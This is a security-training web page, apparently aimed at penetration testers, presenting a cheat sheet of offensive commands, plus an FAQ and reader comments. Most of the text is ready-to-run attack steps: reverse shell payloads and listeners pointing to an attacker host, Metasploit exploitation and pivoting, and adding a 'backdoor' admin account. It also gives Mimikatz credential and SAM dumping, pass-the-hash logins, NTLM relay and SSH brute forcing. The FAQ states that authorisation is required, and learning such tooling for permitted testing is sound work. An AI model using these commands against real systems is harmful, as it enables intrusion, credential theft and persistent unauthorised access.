You have countless hacking tools at your disposal, but they only hold value if you use them to their full potential. Our hacking tools cheat sheet will show you the best tools for specific jobs and how to use them.
Don’t waste your time hammering away at a problem to no avail when there is a perfect tool for the job collecting dust. Master these tools now and become the hacker you’ve always wanted to be.
Click here to download a pdf copy to keep with you, and read on to power up your hacking.
Hacking Tools Cheat Sheet Search
Search our Hacking tools cheat sheet to find the right cheat for the term you're looking for. Simply enter the term in the search bar and you'll receive the matching cheats available.
SHOW EXPLOIT FILE PATH AND COPY IT INTO CLIPBOARD:
# searchsploit -p 40142
ONLINE VULNERABILITY AND EXPLOIT DATABASES:
cvedetails.com, exploit-db.com,
packetstormsecurity.com
Cracking
TRY SSH PASSWORDS FROM A WORDLIST:
# ncrack -p 22 –user root -P
./passwords.txt 10.5.23.0/24
CRACK HASHES (E.G. 5600 FOR NETNTLMV2 TYPE):
# hashcat -m 5600 -a 0 hash.txt
/path/to/wordlists/*
DETERMINE HASH TYPE:
# hashid 869d[…]bd88
SHOW EXAMPLE HASH TYPES FOR HASHCAT:
# hashcat –example-hashes
CRACK HASHES USING JOHN THE RIPPER:
# john hashes.txt
Metasploit Framework
START METASPLOIT:
# msfconsole
USE EXPLOIT:
msf > use exploit/windows/smb/ms17_…
CONFIGURE EXPLOIT:
msf exploit(…) > show options
msf exploit(…) > set TARGET 10.5.23.42
REVERSE SHELL LISTENER:
> use exploit/multi/handler
> set payload
linux/x64/shell_reverse_tcp
> set LHOST 10.5.23.42 # attacker
> set LPORT 443
> exploit
UPLOAD / DOWNLOAD FILES:
meterpreter > upload pwn.exe
meterpreter > download c:\keepass.kdb
BACKGROUND METERPRETER SESSION:
meterpreter > background
SOCKS VIA METERPRETER (REQUIRES AUTOROUTE):
> use auxiliary/server/socks4a
> set SRVPORT 8080
> run
CONNECT THROUGH SOCKS PROXY:
# proxychains ncat 172.23.5.42 1337
SEARCH EXPLOIT:
> search eternalblue
RUN EXPLOIT:
msf exploit(…) > exploit
GENERATE REVERSE SHELL (WAR):
# msfvenom -p
java/jsp_shell_reverse_tcp LHOST=<your
ip address> LPORT=443 -f war > sh.war
UPGRADE TO METERPRETER (OR PRESS ^Z (CTRL-Z)):
background
Background session 1? [y/N] y
> sessions # list sessions
> sessions -u 1 # Upgrade
> sessions 2 # interact with session 2
meterpreter > sysinfo # use it
PORT FORWARDING TO LOCALHOST:
meterpreter > portfwd add -l 2323 -p
3389 -r 10.5.23.23
PIVOTING THROUGH EXISTING METERPRETER SESSION:
> use post/multi/manage/autoroute
> set session 2 # meterpreter session
> run
> route
CONFIGURE PROXYCHAINS:
# vi /etc/proxychains.conf
[…]
socks4 127.0.0.1 1080
Linux Privilege Escalation
ENUMERATE LOCAL INFORMATION (-T FOR MORE TESTS):
# curl -o /tmp/linenum
https://raw.githubusercontent.com/rebo
otuser/LinEnum/master/LinEnum.sh
# bash /tmp/linenum -r /tmp/report
Other hardening checks can be done using lynis or LinPEAS.
Use sudo/SUID/capabilities/etc. exploits from gtfobins.github.io.
Windows Privilege Escalation
SCAN FOR NETWORK SHARES:
# smbmap.py –host-file smbhosts.txt –
u Administrator -p PasswordOrHash
Copy PowerUp.ps1 from GitHub "PowerShellMafia/
PowerSploit" into PowerShell to
bypass ExecutionPolicy and execute Invoke-
AllChecks. Use the abuse functions.
ADD A NEW LOCAL ADMIN:
C:\> net user backdoor P@ssw0rd23
C:\> net localgroup Administrators
backdoor /add
Windows Credentials Gathering
START MIMIKATZ AND CREATE LOG FILE:
C:\>mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log
SHOW PASSWORDS/HASHES OF LOGGED IN USERS:
# sekurlsa::logonpasswords
EXTRACT HASHES USING MIMIKATZ:
# lsadump::sam /system:system.hiv
/sam:sam.hiv
READ LSASS.EXE PROCESS DUMP:
# sekurlsa::minidump lsass.dmp
Dump lsass.exe in taskmgr or procdump.
BACKUP SYSTEM & SAM HIVE:
C:\>reg save HKLM\SYSTEM system.hiv
C:\>reg save HKLM\SAM sam.hiv
Pass-the-Hash
START MIMIKATZ AND CREATE LOG FILE:
C:\>mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log
METERPRETER VIA PASS-THE-HASH:
msf > set payload
windows/meterpreter/reverse_tcp
msf > set LHOST 10.5.23.42 # attacker
msf > set LPORT 443
msf > set RHOST 10.5.23.21 # victim
msf > set SMBPass 01[…]03:01[…]03
msf > exploit
meterpreter > shell
C:\WINDOWS\system32>
OVER A SUBNET AND EXTRACT SAM FILE:
# crackmapexec -u Administrator -H
:011AD41795657A8ED80AB3FF6F078D03
10.5.23.0/24 –sam
RDP VIA PASS-THE-HASH:
# xfreerdp /u:user /d:domain /pth:
011AD41795657A8ED80AB3FF6F078D03
/v:10.5.23.42
BROWSE SHARES VIA PASS-THE-HASH:
# ./smbclient.py
domain/usrname@10.5.23.42 -hashes
:011AD41795657A8ED80AB3FF6F078D03
NTLM Relay
VULNERABLE IF MESSAGE_SIGNING: DISABLED:
# nmap -n -Pn -p 445 –script smbsecurity-
mode 10.5.23.0/24
NTLM RELAY USING SOCKS PROXY:
# ./ntlmrelayx.py -tf targets.txt
-smb2support -socks
Configure ProxyChains:
# vi /etc/proxychains.conf
[…]
socks4 127.0.0.1 1080
DISABLE SMB AND HTTP IN RESPONDER.CONF AND START RESPONDER:
# ./Responder.py -I eth0
NTLM RELAY TO TARGET AND EXTRACT SAM FILE:
# ./ntlmrelayx.py -smb2support -t
smb://10.5.23.42
ACCESS FILES VIA SOCKS PROXY:
# proxychains smbclient -m smb3
‘\\10.5.23.42\C$’ -W pc05 -U
Administrator%invalidPwd
Active Directory
Use SharpHound to gather information and import into Bloodhound to analyze.
Download PingCastle from pingcastle.com and generate Report.
Frequently Asked Questions
What do most hackers use to hack?
There are several tools hackers use to perform hacking. Most commonly, hackers will use:
• Nmap to scan a network • Tools like Netcat or Meterpreter to catch shells • Hashcat for password cracking • Metasploit to manage sessions and launch exploits • Mimikatz for Windows credentials gathering
Assuming you've already gone through the process of getting written permission from the system owner to perform a test and confirmed you were given the correct target IP address, scanning and enumeration would be the first step (sometimes simply referred to as reconnaissance).
Is hacking a crime?
Hacking is not a crime, but hacking a system without the permission of the owner is a crime and can carry very steep legal repercussions.
What coding do hackers use?
Hackers are usually familiar with scripting languages such as Bash, Powershell, and Python. Other coding languages can depend on your specialty (such as C for exploit developers or Java for web application penetration testers).
Which type of hacker is best?
If by types you are referring to:
• White hat (ethical hackers auditing systems with permission) • Black hat (criminal hackers usually seeking to damage a system) • Grey hat (hackers with good intentions but still hack a system without permission) • Red hat hackers (vigilantes who hack black hat hackers)
Then we much prefer white hats. They seek to make the internet a safer place and always with the consent of the system owner. They also benefit from not facing criminal charges and, on average, make more money than the other types.
What do hackers want?
Different hackers want different things. Some want to help defend systems the legal way, some want to defend systems the illegal way, some want to damage systems for fun or profit, and others have different motivations entirely.
The one thing in common is that hackers want to see how a system works and try to make it act in a way it wasn't designed to.
Nathan House is the founder and CEO of StationX. He has over 25 years of experience in cyber security, where he has advised some of the largest companies in the world. Nathan is the author of the popular "The Complete Cyber Security Course", which has been taken by over half a million students in 195 countries. He is the winner of the AI "Cyber Security Educator of the Year 2020" award and finalist for Influencer of the year 2022.
Thank you Nathan, this is useful
Really enjoyed your article as its highly informative
That’s great.
Cheat sheets are useful. If one already knows the basics about a particular topic and if you are in doubt, cheat sheets come in handy!
Awesome
Thanks
Thank You, this is great and I am also looking forward to registering in this course.
agree